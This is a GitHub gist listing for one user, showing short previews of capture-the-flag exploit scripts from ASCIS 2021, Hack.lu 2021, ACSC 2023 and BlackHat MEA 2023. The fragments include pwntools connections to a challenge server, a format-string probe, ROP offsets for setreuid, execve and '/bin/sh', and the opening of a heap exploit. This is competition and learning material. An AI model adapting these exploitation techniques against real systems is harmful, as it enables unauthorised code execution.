Skip to content

Instantly share code, notes, and snippets.

View kungfulon's full-sized avatar

Bien Pham kungfulon

200 followers · 2 following
View GitHub Profile
@kungfulon
kungfulon / exp.py
Created October 16, 2021 13:13
ASCIS 2021 Qualification Round - proxy
#!/usr/bin/env python3
from pwn import *
context.clear(arch='amd64', os='linux', endian='little')
libc = ELF('./libc-2.31.so')
MY_IP = b''
r = remote('125.235.240.166', 20120)
@kungfulon
kungfulon / exp.py
Last active October 17, 2021 01:49
ASCIS 2021 Qualification Round - pwn2win
#!/usr/bin/env python3
from pwn import *
context.clear(arch='amd64', os='linux', endian='little')
r = remote('125.235.240.166', 33333)
# 1st boss
r.sendline(b'%p')
@kungfulon
kungfulon / ex2.py
Last active October 19, 2021 02:05
ASCIS 2021 Qualification Round - image_converter
#!/usr/bin/env python3
import struct
import sys
libc = int(sys.argv[1], 16) - 0x270b3
setreuid = 0x117ab0
execve = 0xe62f0
binsh = 0x1b75aa
poprdx = 0x11c371
@kungfulon
kungfulon / exp.c
Created October 31, 2021 22:51
Hack.lu CTF 2021 Cloudinspect
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#define INFO "[*] "
@kungfulon
kungfulon / readme.md
Last active March 4, 2024 09:43
ACSC 2023 Write-up

Welcome

Discord flag.

Merkle Hellman

Brute force byte-by-byte and apply encrypt function to verify.

from pwn import *
@kungfulon
kungfulon / exp.py
Created November 16, 2023 06:03
BlackHat MEA 2023 - House of Minho
from pwn import *
context.update(os='linux', arch='amd64')
r = process('./minho')
l = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def new(size, data, abuse_scanf=0):
r.sendlineafter(b'> ', b'1')
r.sendlineafter(b': ', b'0' * abuse_scanf + str(size).encode())